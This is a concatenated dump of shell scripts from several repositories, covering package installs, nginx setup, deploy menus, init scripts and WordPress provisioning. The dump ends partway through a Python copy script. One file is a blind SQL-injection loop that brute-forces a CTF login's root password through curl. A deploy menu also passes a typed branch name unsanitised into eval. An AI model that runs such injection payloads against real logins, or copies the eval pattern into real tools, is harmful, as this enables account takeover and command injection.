# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
if [ ${DIB_DEBUG_TRACE:-1} -gt 0 ]; then
set -x
fi
set -eu
set -o pipefail
PBCDIR=/usr/share/python-brickclient
mkdir $PBCDIR
# create the virtual environment
virtualenv $PBCDIR/venv
# Install the required packages inside virtual env
$PBCDIR/venv/bin/pip install python-brick-cinderclient-ext
ln -s $PBCDIR/venv/bin/python-brickclient /usr/local/bin/python-brickclient
| true |
0e985d3feaf1a76be7d50b6d8eb37d13a3190d55 | Shell | kmyk/welcome-ctf-2016 | /a.sh | UTF-8 | 417 | 3.046875 | 3 | [] | no_license | #!/usr/bin/bash
s=
found=
while [ -z "$found" ] ; do
for c in {a..z} ; do
if curl /path/to/welcome-ctf-2016/problem/login.php -F userid="' or ( id = 'root' and password like '$s$c%' ) --" -F password= -F login=login 2>/dev/null | grep -q 'something wrong' ; then
s=$s$c
echo $s
break
fi
if [ $c = z ] ; then
found=t
fi
done
done
| true |
00373f034e474a272bb2bb8a4bbaf99a87459da2 | Shell | reginaldobo/story_review | /deploy-sr.sh | UTF-8 | 1,407 | 3.75 | 4 | [] | no_license | #!/bin/bash
#################################################################
# Key file
#
CHAVE="/home/keys/key_file.pem"
#
################################################################
#
function menu() {
echo "Options:"
echo "L - List Containers"
echo "D - Deploy Branch"
echo "R - Remove Branch"
echo "S - Sync Database"
echo "Q - Quit"
}
#
################################################################
#
#
ssh-add -k $CHAVE
clear
while(true)
do
#clear
menu
read choice
case $choice in
[lL])
clear
echo "Wait..."
ssh -A ec2-user@bastion_host "ssh ubuntu@instance_ip 'bash ~/scripts/get_links.sh'"
;;
[dD])
echo "Type a Branch: "
read branch
clear
echo "Wait..."
comando="ssh -A ec2-user@bastion_host \"ssh ubuntu@instance_ip 'bash ~/scripts/dockerDeploy.sh $branch'\""
eval $comando
;;
[rR])
echo "Type a Branch: "
read branch
clear
echo "Wait..."
comando="ssh -A ec2-user@bastion_host \"ssh ubuntu@instance_ip 'bash ~/scripts/dockerRemove.sh $branch'\""
eval $comando
;;
[sS])
clear
echo "Wait..."
ssh -A ec2-user@bastion_host "ssh ubuntu@instance_ip 'bash ~/scripts/sync_prod_db.sh'"
;;
[qQ])
exit 0
;;
*)
clear
echo "Invalid Option!"
;;
esac
done
| true |
5f3d929c4ba41f682870b466e8ce30ec698014db | Shell | haokaiyang/Mac-QuickLook | /QuickLookPlugins/QLMarkdown.qlgenerator/Contents/Resources/update.sh | UTF-8 | 1,269 | 3.828125 | 4 | [
"CC0-1.0"
] | permissive | #!/bin/bash
status_msg () {
if [ -t FD ] ; then
echo -e "\033[1m$1\033[0m"
else
echo "$1"
fi
}
error_msg () {
if [ -t FD ] ; then
echo -e "\033[31m$1\033[0m" >&2
else
echo "$1" >&2
fi
tput sgr0
}
# CD into script dir -1
cd "$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"/..
# Checkout the discount module if necessary
if [[ ! -a $PWD/discount/configure.sh ]] ; then
status_msg "Updating the discount directory..."
git submodule update --init
fi
status_msg "Running configure.sh..."
cd discount
./configure.sh --with-fenced-code
# make the blocktags
make blocktags
status_msg "Copying important files..."
if head -n 1 config.h | grep -q "^/\*$"; then
# remove generated comments in config.h
sed '1,/^ *\*\/ *$/ { d; }' <config.h >../discount-config/config.h && echo 'config.h'
else
cp config.h ../discount-config/config.h && echo 'config.h'
error_msg "Can't locate config.h comments!"
error_msg "Check the diff before committing (and fix this script if you can)"
fi
cp mkdio.h ../discount-config/mkdio.h && echo 'mkdio.h'
cp blocktags ../discount-config/blocktags && echo 'blocktags'
status_msg "Clean files from working directory..."
# clean the working directory of generated files and folders
git clean -f -d
status_msg "Done!"
| true |
752c2e9c0972812c2e74a19cc0480d25802ac78b | Shell | gogomillan/holberton-system_engineering-devops | /0x0C-web_server/4-not_found_page_404 | UTF-8 | 910 | 3.1875 | 3 | [] | no_license | #!/usr/bin/env bash
# Install Nginx server if neccesary
# Nginx index by default turns to Holberton School
# Nginx server so that /redirect_me is redirecting to another page.
# Nginx server to have a custom 404 page that contains the string Ceci n'est pas une page.
sudo apt-get update
sudo apt-get -y install nginx
sudo service nginx start
sudo rm /var/www/html/index.html
sudo bash -c "echo 'Holberton School' > /var/www/html/index.html"
export LINE="rewrite ^\/redirect_me https:\/\/www.youtube.com\/watch?v=QH2-TGUlwu4 permanent;"
sudo sed -i "26i ${LINE}" /etc/nginx/sites-available/default
sudo bash -c "printf 'Ceci n\x27est pas une page\n' > /var/www/html/404.html"
export LINE="\\\terror_page 404 /404.html;\n\tlocation = /404.html {\n\t\troot /var/www/html;\n\t\tinternal;\n\t}"
sudo sed -i "27i ${LINE}" /etc/nginx/sites-available/default
sudo service nginx restart && sudo service nginx reload
| true |
82c57df425ba43d6ac7f3420d60e0056f39f35e3 | Shell | nobiruwa/home-directory | /bin/install-pandoc.sh | UTF-8 | 3,205 | 3.984375 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# GitHubのリリースページを辿ってpandocコマンドを$HOME/.local/binディレクトリにインストールするスクリプトです。
# コマンドライン引数
# 1st positional argument (amd64かarm64。デフォルトはamd64)
PLATFORM=${1:-amd64}
if [ "${PLATFORM}" != "amd64" -a "${PLATFORM}" != "arm64" ]; then
echo "unknown platform specified: ${PLATFORM}"
echo "Only both amd64 and arm64 are allowed."
exit 1
fi
# 固定値
BASE_RELEASE_URL='https://github.com/jgm/pandoc/releases/'
BASE_RELEASE_TAG_URL="${BASE_RELEASE_URL}tag/"
LATEST_RELEASE_URL="${BASE_RELEASE_URL}latest"
LOG_PATH="/tmp/install-pandoc.log"
echo '# curl' > "${LOG_PATH}"
# locationヘッダーから最新バージョンのリリースページのURLを取得する
# 途中、CRLFのCRが出力に残るためtrコマンドで除去
ACTUAL_RELEASE_URL=`curl --head "${LATEST_RELEASE_URL}" 2>> "${LOG_PATH}" | grep '^location:' | tr -d '\r' | cut -d' ' -f 2`
echo "actual release path: ${ACTUAL_RELEASE_URL}" | tee -a "${LOG_PATH}"
LATEST_VERSION=`echo "${ACTUAL_RELEASE_URL}" | sed -e "s|${BASE_RELEASE_TAG_URL}||"`
echo "actual latest version: ${LATEST_VERSION}" | tee -a "${LOG_PATH}"
# ダウンロードURLの例: https://github.com/jgm/pandoc/releases/download/2.17.1.1/pandoc-2.17.1.1-linux-amd64.tar.gz
FILE_NAME="pandoc-${LATEST_VERSION}-linux-${PLATFORM}.tar.gz"
DOWNLOAD_URL="${BASE_RELEASE_URL}download/${LATEST_VERSION}/${FILE_NAME}"
echo "download url: ${DOWNLOAD_URL}" | tee -a "${LOG_PATH}"
# /tmpディレクトリにワークディレクトリを用意する
# ワークディレクトリはwgetコマンドが作成する
WORK_DIR="/tmp/pandoc-${LATEST_VERSION}"
DOWNLOAD_PATH="${WORK_DIR}/${FILE_NAME}"
# ファイルをダウンロード
mkdir -p "${WORK_DIR}"
wget --no-verbose "${DOWNLOAD_URL}" -O ${DOWNLOAD_PATH} 2>> "${LOG_PATH}"
WGET_EXIT_CODE=$?
if [ $WGET_EXIT_CODE -ne 0 ]; then
echo "faield to download ${DOWNLOAD_URL}" | tee -a "${LOG_PATH}"
echo "see ${LOG_PATH}"
exit 1
fi
# tar.gzを解凍
tar zxf "${DOWNLOAD_PATH}" -C "$WORK_DIR"
# tar.gzを解凍するとpandoc-${LATEST_VERSION}ディレクトリが作られる
# その配下にはbinディレクトリとshareディレクトリがある
BIN_DIR_PATH="${WORK_DIR}/pandoc-${LATEST_VERSION}/bin"
SHARE_DIR_PATH="${WORK_DIR}/pandoc-${LATEST_VERSION}/share"
# binディレクトリとshareディレクトリを$HOME/.localにコピー
DESTINATION_DIR_PATH="${HOME}/.local"
mkdir -p "${DESTINATION_DIR_PATH}"
echo "copy ${BIN_DIR_PATH} to ${DESTINATION_DIR_PATH}" | tee -a "${LOG_PATH}"
cp -r "${BIN_DIR_PATH}" "${DESTINATION_DIR_PATH}" 2>&1 | tee -a "${LOG_PATH}"
BIN_COPY_EXIT_CODE=$?
echo "copy ${SHARE_DIR_PATH} to ${DESTINATION_DIR_PATH}" | tee -a "${LOG_PATH}"
cp -r "${SHARE_DIR_PATH}" "${DESTINATION_DIR_PATH}" 2>&1 | tee -a "${LOG_PATH}"
SHARE_COPY_EXIT_CODE=$?
if [ $BIN_COPY_EXIT_CODE -eq 0 -a $SHARE_COPY_EXIT_CODE -eq 0 ]; then
echo "pandoc path: `command -v pandoc`"
exit 0
else
echo "failed to copy ${BIN_DIR_PATH} or ${SHARE_DIR_PATH} to ${DESTINATION_PATH}" | tee -a "${LOG_PATH}"
echo "see ${LOG_PATH}"
exit 1
fi
| true |
4173b6ac62894084a0ca17a1572af14306d5cecb | Shell | dhivakar08/Linux-Study | /Shell-Scripts/02.Print.sh | UTF-8 | 1,823 | 3.171875 | 3 | [] | no_license | ## Color Code (\e)
#echo -e "\e[COL-CODEmMessage"
# Colors are two types
## Color ForegroundColor BackgroundColor
# Red 31 41
# Green 32 42
# Yello 33 43
# Blue 34 44
# Magenta 35 45
# Cyan 36 46
echo -e "\e[31mHello World in Red Color"
echo -e "\e[43mYellow Background Content"
# Observations:
# Color gets followed.
# red color is available on yellow background text
# yellow back background is available to next lines as well.
## Note: When you enable color and after the text , We need to disable the color.
# Disabling color code is 0
## Reset the color
echo -e "\e[0m"
echo -e "\e[31mHello World in Red Color\e[0m"
echo -e "\e[43mYellow Background Content\e[0m"
## Combine both forground and background colors.
echo -e "\e[31;42m Hello World \e[0m"
## Tasks for practice
# 1. Make a text with all the color combinations, Every word ont he below line should be a different color, Adjecent two words cannot have same color.
# The number of positive novel coronavirus cases in India surged to 830 on Friday, the third day of the 21-day lockdown imposed to combat the Covid-19 outbreak, while the death toll rose to 20. Almost 100 new cases were reported across India after the health ministry on Friday morning said that the total number of cases stood at 724.
#-------------------------------------------------
#Changing image terminal prompt color
# cat /etc/profile.d/ps1.sh
# echo $PS1
# PS1=[\u@\h \w] ---- \u username \h hoatname \w basename of current working dir
| true |
777d12aa94e0e77c463ea0d9a449bb13600a30aa | Shell | breunigs/bravia-auth-and-remote | /example_goto_media_player.sh | UTF-8 | 860 | 3.546875 | 4 | [
"ISC"
] | permissive | #!/bin/bash
set -e
cd $(dirname $0)
if [ "$1" = "" ]; then
echo "Usage: $0 <TV_IP>"
exit 1
fi
if ! [ -e 'auth_cookie' ]; then
echo 'auth_cookie not found. Run ./auth.sh first.'
exit 1
fi
declare -A commandmap
commandmap[DIGITAL]="AAAAAgAAAJcAAAAyAw=="
commandmap[EXIT]="AAAAAQAAAAEAAABjAw=="
commandmap[HOME]="AAAAAQAAAAEAAABgAw=="
commandmap[DOWN]="AAAAAQAAAAEAAAB1Aw=="
commandmap[UP]="AAAAAQAAAAEAAAB0Aw=="
commandmap[LEFT]="AAAAAQAAAAEAAAA0Aw=="
commandmap[CONFIRM]="AAAAAQAAAAEAAABlAw=="
commandmap[ENTER]="AAAAAQAAAAEAAAALAw=="
tv_ip=$1
remote() {
echo -n "$1: "
./send_command.sh $tv_ip ${commandmap[$1]}
}
# get into known state
remote 'DIGITAL'
sleep 4
echo 'Waiting for TV to boot fully…'
sleep 30
remote 'HOME'
sleep 6
# select 'media player in lower left corner'
remote 'DOWN'
remote 'DOWN'
remote 'LEFT'
remote 'CONFIRM'
| true |
535e7412d935ccd72ed059a94eae5ea9141f8230 | Shell | ducklingcloud/clb | /clb-server/scripts/pdfexport-install.sh | UTF-8 | 692 | 3.40625 | 3 | [] | no_license |
#!/bin/bash
PX_HOME=/usr/local/pdfexport
if [ -d ${PX_HOME} ]
then
echo "${PX_HOME} is already existed."
else
echo "Create ${PX_HOME}"
mkdir -p ${PX_HOME}
fi
cd ${PX_HOME}
rm -rf *
wget ftp://ftp.cerc.cnic.cn/incoming/liji/apps/pdfexport.x64.tar.gz
tar zxvf pdfexport.x64.tar.gz
cd pdfexport
mv * ../
cd ../
rm -rf pdfexport pdfexport.x64.tar.gz
if [ -z "$LD_LIBRARY_PATH" ]
then
etc_profile=/etc/profile
echo "export LD_LIBRARY_PATH=${PX_HOME}/lib" >> $etc_profile
echo "LD_LIBRARY_PATH now is initialized, you need to run [source /etc/profile]"
else
echo "LD_LIBRARY_PATH is already existed"
fi
yum -y install compat-libstdc++-33.x86_64
| true |
e5d1e6fda183a845df72c8bb8cece63c2e565958 | Shell | bval/jarvis | /bin/init-script | UTF-8 | 4,709 | 3.421875 | 3 | [] | no_license | #! /bin/sh
### BEGIN INIT INFO
# Provides: jarvis
# Required-Start: $ejabberd $ircd-hybrid $syslog
# Required-Stop: $ejabberd $ircd-hybrid $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 1
# Short-Description: XMPP / IRC chatbots
### END INIT INFO
# Abort the whole script as soon as any command fails.
set -e
# /etc/init.d/jarvis: start and stop the xmpp / irc chatbots
protect_default_file(){
    # Tighten ownership and permissions on the defaults file so the
    # credentials it may contain are only readable by root.
    # Reads ${DEFAULT_FILE}; silently does nothing when it is unset or
    # the file does not exist.
    #
    # Fix: the stat calls previously hard-coded /etc/default/jarvis,
    # so the checks were wrong whenever DEFAULT_FILE pointed elsewhere.
    if [ -n "${DEFAULT_FILE}" ]; then
        if [ -f "${DEFAULT_FILE}" ]; then
            if [ "$(stat -c '%U:%G' "${DEFAULT_FILE}")" != "root:root" ]; then
                chown root:root "${DEFAULT_FILE}"
            fi
            if [ "$(stat -c '%A' "${DEFAULT_FILE}")" != "-r--------" ]; then
                chmod 0400 "${DEFAULT_FILE}"
            fi
        fi
    fi
}
# Location of the optional defaults file; locked down before being sourced
# because it may contain credentials.
export DEFAULT_FILE="/etc/default/jarvis";
protect_default_file
if test -f ${DEFAULT_FILE}; then
    . ${DEFAULT_FILE}
fi
# LSB helpers: log_daemon_msg, log_end_msg, status_of_proc, ...
. /lib/lsb/init-functions
# Are we running from init (a runlevel transition), or in single-user mode?
run_by_init() {
    { [ -n "$previous" ] && [ -n "$runlevel" ]; } || [ "$runlevel" = S ]
}
# Print the current commit id of ${GIT_REPO}. Prints "0" and returns
# non-zero when git integration is disabled or unconfigured.
# Fixed: `return -1` is not a valid status for the POSIX/bash return
# builtin (status must be 0-255); use 1. The GIT_ENABLED comparison is
# quoted so a non-numeric value cannot break the test expression.
git_revision(){
  if [ -z "${GIT_ENABLED}" ]; then
    echo 0
    return 1
  fi
  if [ "${GIT_ENABLED}" -ne 1 ]; then
    echo 0
    return 1
  fi
  if [ -n "${GIT_ROOT}" ] && [ -n "${GIT_REPO}" ]; then
    # NOTE(review): parses `git log` header; `git rev-parse HEAD` would be
    # simpler — left as-is to preserve the exact output format.
    echo $(cd "${GIT_REPO}"; git log| head -1|awk '{print $2}')
  fi
}
# Clone or update the jarvis checkout and reinstall this init script when
# the repo copy differs. Returns non-zero when git integration is not
# fully configured (GIT_ENABLED/GIT_ROOT/GIT_REPO unset).
git_update(){
  if [ -z "${GIT_ENABLED}" ]; then return 1; fi
  if [ -z "${GIT_ROOT}" ]; then return 1; fi
  if [ ! -d "${GIT_ROOT}" ]; then
    mkdir -p "${GIT_ROOT}"
  fi
  if [ -z "${GIT_REPO}" ]; then return 1; fi
  if [ ! -d "${GIT_REPO}" ]; then
    echo "GIT_REPO DOES NOT EXIST"
    if [ -n "${GIT_SOURCE}" ]; then
      (cd "${GIT_ROOT}"; git clone "${GIT_SOURCE}")
    else
      echo "GIT_SOURCE NOT DEFINED CANNOT CREATE GIT_REPO"
      return 1
    fi
  else
    (cd "${GIT_REPO}"; git pull origin master)
  fi
  # This is a temporary hack until the init script is stable:
  # Fixed: md5sum prints "<hash>  <file>", so the checksum is field $1; the
  # original compared field $2 (the file names), which always differ, making
  # the script reinstall itself on every start.
  NOW=$(md5sum /etc/init.d/jarvis | awk '{print $1}')
  NEW=$(md5sum ${GIT_REPO}/bin/init-script | awk '{print $1}')
  if [ "${NOW}" != "${NEW}" ]; then
    install -m 0744 ${GIT_REPO}/bin/init-script /etc/init.d/jarvis
  fi
}
# Placeholder for rollback logic. Currently only validates that git
# integration is enabled; returns non-zero when GIT_ENABLED is unset/empty.
# Fixed: the test lacked a space before the closing "]" (a syntax error at
# call time), and `return -1` is not a valid return status.
git_rollback(){
  if [ -z "${GIT_ENABLED}" ]; then
    return 1
  fi
}
# Make sure the sbin dirs are reachable for start-stop-daemon etc.
export PATH="${PATH:+$PATH:}/usr/sbin:/sbin"
# Fallback values for settings normally supplied by ${DEFAULT_FILE}.
if [ -z "${PID_FILE}" ]; then
  export PID_FILE="/var/run/jarvis.pid"
fi
if [ -z "${RUN_AS}" ]; then
  export RUN_AS='root'
fi
if [ -z "${LOG_NAME}" ]; then
  export LOG_NAME='XMPP / IRC chatbot daemon'
fi
if [ -z "${DAEMON_NAME}" ]; then
  export DAEMON_NAME='universal.pl'
fi
if [ -z "${LOG_FILE}" ]; then
  export LOG_FILE='/dev/null'
fi
# Standard SysV init actions. start/stop identify running instances by
# grepping ps for "${GIT_REPO}/universal" owned by ${RUN_AS}.
case "$1" in
  start)
	log_daemon_msg "Starting ${LOG_NAME}" "${DAEMON_NAME}"
	protect_default_file
	git_update
	export GIT_REVISION=$(git_revision)
	# Create the pid file (and its directory) owned by the service user.
	if [ ! -f "${PID_FILE}" ]; then
	    PID_DIR=$(dirname $PID_FILE)
	    if [ ! -d ${PID_DIR} ] ;then mkdir -p ${PID_DIR}; fi
	    touch ${PID_FILE}
	    chown ${RUN_AS} ${PID_FILE}
	fi
	# Count already-running bot processes; only start when none exist.
	COUNT=$(ps -ef | grep "${GIT_REPO}/uni[v]ersal" | awk -v runas="${RUN_AS}" '{if($1==runas){print $2}}'|wc -l)
	if [ ${COUNT} -eq 0 ]; then
	    start-stop-daemon --start --quiet --oknodo \
		--pidfile ${PID_FILE} \
		--chdir ${GIT_REPO} \
		--chuid ${RUN_AS} \
		--exec ${GIT_REPO}/universal.pl -- >> ${LOG_FILE} 2>&1 &
	    SSD_EXIT=$?
	    echo $! > ${PID_FILE}
	    # NOTE(review): `[ ${SSD_EXIT} ]` tests for a non-empty string, not
	    # for a zero status — it is true even when start-stop-daemon failed.
	    if [ ${SSD_EXIT} ]; then
		log_end_msg 0
	    else
		log_end_msg 1
	    fi
	else
	    echo "${GIT_REPO}/uni[v]ersal already running"
	    exit -1
	fi
	;;
  stop)
	log_daemon_msg "Stopping ${LOG_NAME}" "${DAEMON_NAME}"
	if start-stop-daemon --stop --quiet --oknodo --pidfile ${PID_FILE}; then
	    log_end_msg 0
	else
	    log_end_msg 1
	fi
	# Belt-and-braces: kill any stragglers the pid file did not cover.
	for proc in $(ps -ef | grep "${GIT_REPO}/uni[v]ersal" | awk -v runas="${RUN_AS}" '{if($1==runas){print $2}}');do
	    kill -9 ${proc}
	done
	;;
  reload|force-reload)
	log_daemon_msg "Reloading ${LOG_NAME}" "${DAEMON_NAME}"
	# Signal 1 (SIGHUP) asks the bot to reload its configuration.
	if start-stop-daemon --stop --signal 1 --quiet --oknodo --pidfile ${PID_FILE} --chdir ${GIT_REPO} --chuid ${RUN_AS} --exec ${GIT_REPO}/universal.pl; then
	    log_end_msg 0
	else
	    log_end_msg 1
	fi
	;;
  restart)
	log_daemon_msg "Restarting ${LOG_NAME}" "${DAEMON_NAME}"
	$0 stop
	$0 start
	;;
  status)
	status_of_proc -p ${PID_FILE} universal.pl && exit 0 || exit $?
	;;
  *)
	log_action_msg "Usage: /etc/init.d/jarvis {start|stop|reload|force-reload|restart|status}"
	exit 1
esac
exit 0
| true |
453922232101a86e4daf0b40ecb1bb1202c06895 | Shell | cupkes/psim01 | /scripts/init_logging.sh | UTF-8 | 824 | 3.53125 | 4 | [] | no_license | #!/bin/bash -e
#
# Script for initializing logging
##################################################
# Creates the stratatron directory layout, routes local5.debug syslog
# traffic to a dedicated log file, then verifies the route with a marker
# message. Intended for Solaris (svcadm); must run as root.
cd /
mkdir /opt/stratatron
mkdir /opt/stratatron/etc
mkdir /opt/stratatron/bin
chmod 777 /opt/stratatron/etc/
chmod 777 /opt/stratatron/bin/
mkdir /var/log/strata_logs
touch /var/log/strata_logs/init.log
cat <<ENDOC >>/etc/syslog.conf
# STRATATRON MODIFICATION
local5.debug /var/log/strata_logs/init.log
# END STRATATRON MODIFICATION
ENDOC
svcadm refresh system/system-log
# introduce wait code for refresh process
sleep 10
logger -p local5.debug stratatron
# Verify the marker reached the log file.
# Fixed: the original "LOG =g$(...)" ran a command named LOG, the expansion
# ${$LOG:?...} is invalid syntax, the grep path had a bogus trailing
# component, and the log text was pasted into the awk program instead of
# being piped to awk.
LOG=$(grep stratatron /var/log/strata_logs/init.log)
LOGENTRY=${LOG:?"Expected log entry missing."}
LOGVALUE=$(printf '%s\n' "$LOGENTRY" | awk '{print $10}')
# NOTE(review): field $10 assumes a fixed syslog line layout — confirm
# against the target system's syslog format.
if [ "$LOGVALUE" == "stratatron" ]
then
    echo "logging initialized"
else
    echo "error initializing logging"
fi
| true |
5a7ce2aaf60f2a30cade1b93b5db9b85e49c9d1d | Shell | geraldstanje/rust_snippets | /c++_to_rust/build.sh | UTF-8 | 288 | 3.078125 | 3 | [
"MIT"
] | permissive | #!/bin/sh
# Build the Rust static libraries (libadd.a, libhello.a) and link them
# into the C++ main binary.
all() {
  rustc src/add.rs
  rustc src/hello.rs
  # NOTE(review): -lSystem is a macOS link flag — this target presumably
  # only builds on macOS.
  g++ -Wall -o main src/main.cpp -L $(pwd) -ladd -lhello -lSystem -lpthread -lc -lm
}
# Remove the build artifacts produced by all().
clean() {
  rm libadd.a
  rm libhello.a
  rm main
}
# Dispatch: run the named target, or print an error to stderr and fail.
case $1 in all|clean) "$1" ;; *) printf >&2 '%s: unknown command\n' "$1"; exit 1;; esac
13a4f29b6a3f9edddc650956639656218e200469 | Shell | tothegump/LKI | /scripts/newblog | UTF-8 | 416 | 3.640625 | 4 | [] | no_license | #!/usr/bin/env bash
# make a new jekyll blog
set -e
# Require the post name as the first argument.
if [[ $# -lt 1 ]]; then
    echo "usage: newblog <some blog name>"
    exit 1
fi
NAME=$1
# Jekyll posts are named YYYY-MM-DD-<name>.md.
FILENAME="`date '+%Y-%m-%d'`-$1.md"
# When run from a Jekyll site root, place the post under _posts/.
if [[ -d "_posts" ]]; then
    FILENAME="_posts/${FILENAME}"
fi
# Write the front matter; ${NAME} and the date commands expand inside the
# heredoc.
cat > ${FILENAME} <<EOF
---
layout: post
title: "${NAME}"
date: "`date '+%Y-%m-%d %H:%M:%S'`"
permalink: /${NAME}
---
${NAME}
<!--MORE-->
EOF
# Print the created path so the caller can open it.
echo ${FILENAME}
| true |
00724a2705c1caace475a270114a0adc46ce03d0 | Shell | Hung040299/AppletServer | /assets/dodai/delete_collection.sh | UTF-8 | 531 | 3.625 | 4 | [] | no_license | #! /bin/bash -eu
# shellcheck shell=bash
# Shared dodai settings/helpers; presumably provides gDodaiBaseURL,
# gDodaiRootKey and libSetTargetConfig used below — verify in dodaiInfo.sh.
source ./dodaiInfo.sh
# Print usage help and abort with status 1.
# Fixed: the original only printed when called with an argument count other
# than one, so `usage somearg` was a silent successful no-op.
usage() {
    echo "${0} [dev|stg|prod] [collection_name]"
    exit 1
}
#$1 is collection name
# Delete a dodai collection via the REST API (DELETE /collection/<name>).
# Uses globals gDodaiBaseURL and gDodaiRootKey from the sourced config.
deleteCollection() {
    # `local` keeps these from leaking into the caller's scope.
    local collection_name=$1
    local auth_head="Authorization:${gDodaiRootKey}"
    curl -X DELETE -H "${auth_head}" "${gDodaiBaseURL}collection/${collection_name}"
}
#$1 is [dev|stg|prod]
#$2 is [collection name]
# Entry point: validate the argument count, load the environment-specific
# dodai config, then delete the named collection.
main() {
    if [ $# -ne 2 ]; then
        usage
        exit 1
    fi
    # libSetTargetConfig comes from the sourced dodaiInfo.sh.
    libSetTargetConfig "$1"
    deleteCollection "$2"
}
main "$@"
| true |
9697f57e683cb17b74dc3e195097eacb47b31368 | Shell | kolyaiks/devops-school-aws-iac | /userData.tpl | UTF-8 | 1,845 | 3.078125 | 3 | [] | no_license | #!/bin/bash
# EC2 user-data rendered by Terraform templatefile(): every ${...} below is
# a Terraform template variable (efs_dns_name, db_*, alb_dns, wp_*, ...),
# not a shell variable. Installs Apache/PHP, mounts EFS for wp-content,
# and bootstraps WordPress with wp-cli.
#=== OS Update ======
yum update -y
#=== Install Apache Web Sever and MySQL =====
yum install httpd mysql -y
systemctl enable httpd
systemctl start httpd
#==== Install PHP and library to work with images =======
amazon-linux-extras install php7.2 -y
yum install -y php-gd -y
#=== Mounting EFS to local system's folder used by WP ===
mkdir /var/www/html/wp-content/
mount -t nfs -o nfsvers=4.1,rsize=1048576,wsize=1048576,hard,timeo=600,retrans=2,noresvport \
${efs_dns_name}:/ \
/var/www/html/wp-content/
#====== WordPress ========
curl -O https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar
chmod +x wp-cli.phar
cp wp-cli.phar /usr/local/bin/wp && cp /usr/local/bin/wp /usr/bin/wp
wp cli update
wp core download --path=/var/www/html
chown -R apache:apache /var/www/html/*
cd /var/www/html
wp config create --dbname=${db_name} --dbuser=${db_user} \
--dbpass=${db_password} --dbhost=${db_host}
# in case of already existing database wp installation will fail
# with error "WordPress is already installed.", so we are not allowed
# to have wp database before creation it via command below
wp db create
wp core install --url=http://${alb_dns} --title=wp-${company_name} \
--admin_user=${wp_admin} --admin_password=${wp_password} --admin_email=${wp_admin_email}
#=== Customizing first WP post and saving image to EFS ====
wp post update 1 --path="/var/www/html" \
--post_title="Hello cloud" \
--post_content="This WordPress is spun up at AWS using Terraform by Nikolai Sergeev, 20th stream of DevOps School. <br> Reach out to me: <a href=\"https://www.niks.cloud/\">https://www.niks.cloud/</a>"
wp media import "https://www.niks.cloud/images/photo_2020-03-10_00-31-34.jpg" \
    --post_id=1 --title="kolyaiks" --featured_image --path="/var/www/html"
#=== Restart Apache Web Sever ===
systemctl restart httpd
| true |
18617f09fee1a5b17879a01908e520cc2b00a783 | Shell | bbenne10/antigen-themes | /themes/bbennett2.zsh-theme | UTF-8 | 1,043 | 3.65625 | 4 | [
"MIT"
] | permissive | ZSH_THEME_GIT_PROMPT_PREFIX="─(%{$fg[cyan]%}"
# Suffix closes the branch segment; %(?.green.red) colors it by last status.
ZSH_THEME_GIT_PROMPT_SUFFIX="%(?.%{$fg[green]%}.%{$fg[red]%}))"
# Marker appended by parse_git_dirty when the work tree has changes.
ZSH_THEME_GIT_PROMPT_DIRTY="±"
# Show the active pyenv version as "(x.y.z)"; the default "system"
# interpreter (and an empty answer) produce no output.
pyenv_prompt_info() {
  local ver
  ver="$(pyenv version-name)"
  if [[ -n "$ver" && "$ver" != system ]]; then
    echo "($ver)"
  fi
}
# Render the current git branch (or short commit id when detached) wrapped
# in the ZSH_THEME_GIT_PROMPT_* decorations; empty outside a repo or when
# the user set `git config oh-my-zsh.hide-status 1`.
function git_prompt_info() {
  # original version of this didn't seem to work on OpenBSD. This should have
  # the same functionality as upstream where it works, but also works on my
  # OpenBSD install.
  local ref
  if [[ "$(command git config --get oh-my-zsh.hide-status 2>/dev/null)" != "1" ]]; then
    # Prefer the symbolic branch name; fall back to the short SHA when HEAD
    # is detached.
    ref=$(command git symbolic-ref HEAD 2> /dev/null) || ref=$(command git rev-parse --short HEAD 2> /dev/null)
    if [ -z "$ref" ]; then
      return 0
    fi
    # parse_git_dirty is provided by the surrounding theme framework.
    echo "$ZSH_THEME_GIT_PROMPT_PREFIX${ref#refs/heads/}$(parse_git_dirty)$ZSH_THEME_GIT_PROMPT_SUFFIX"
  fi
}
# Right prompt: pyenv version (evaluated per-prompt) plus the cwd in magenta.
RPROMPT=$'\$(pyenv_prompt_info) %E%{$fg[magenta]%}%~%{$reset_color%}'
# Left prompt: "(root)" marker for uid 0, git info colored by exit status.
PROMPT="%(!.%{$fg[blue]%}(root).)%(?.%{$fg[green]%}.%{$fg[red]%})\$(git_prompt_info)─→%{$reset_color%} "
| true |
f8a99a0b74fb373157e629ccb9cab12a7e8daf2e | Shell | singledo/SortCode | /script/FileMove.py | UTF-8 | 2,776 | 3.078125 | 3 | [] | no_license | #!/bin/bash
#-*- coding=utf-8 -*-
import os
import sys
import shutil
import getopt
def Traver(path="", suffiexs=""):
    """Recursively collect files under ``path`` ending with ``suffiexs``.

    Args:
        path: directory to walk; when it is not a directory, None is returned.
        suffiexs: required filename suffix (e.g. ".md"); "" matches all files.

    Returns:
        List of full file paths, or None when ``path`` is not a directory.
    """
    if not os.path.isdir(path):
        return None
    filelist = []
    for root, dirs, files in os.walk(path, topdown=False):
        for name in files:
            # str.endswith replaces the fragile manual slice comparison, and
            # os.path.join replaces non-portable "/" concatenation.
            if name.endswith(suffiexs):
                filelist.append(os.path.join(root, name))
    return filelist
def Copy(src="", dst="", isOverWrite=True):
    """Flat-copy every .md file found under ``src`` into ``dst``.

    Args:
        src: source directory tree (scanned with Traver).
        dst: destination directory; created when missing.
        isOverWrite: when False existing destination files are skipped,
            when True they are replaced.
    """
    filelist = Traver(path=src, suffiexs=".md")
    if filelist is None:
        # Guard: the original crashed with a TypeError (iterating None)
        # when src was not a directory.
        print("source path is not a directory")
        return
    if not os.path.exists(dst):
        os.makedirs(dst)
        print("destnation direction not exits, we create it.")
    print("#### Do copying")
    for file in filelist:
        # os.path.basename/join replace manual "/" splitting and the
        # trailing-slash trimming (which crashed on an empty dst).
        dstfile = os.path.join(dst, os.path.basename(file))
        if os.path.exists(dstfile):
            print("{" + dstfile + "} is exits")
            if not isOverWrite:
                print(" #### Skip ####")
                continue
            os.remove(dstfile)
            print(" ### Remove Write Done.")
        if os.path.exists(file):
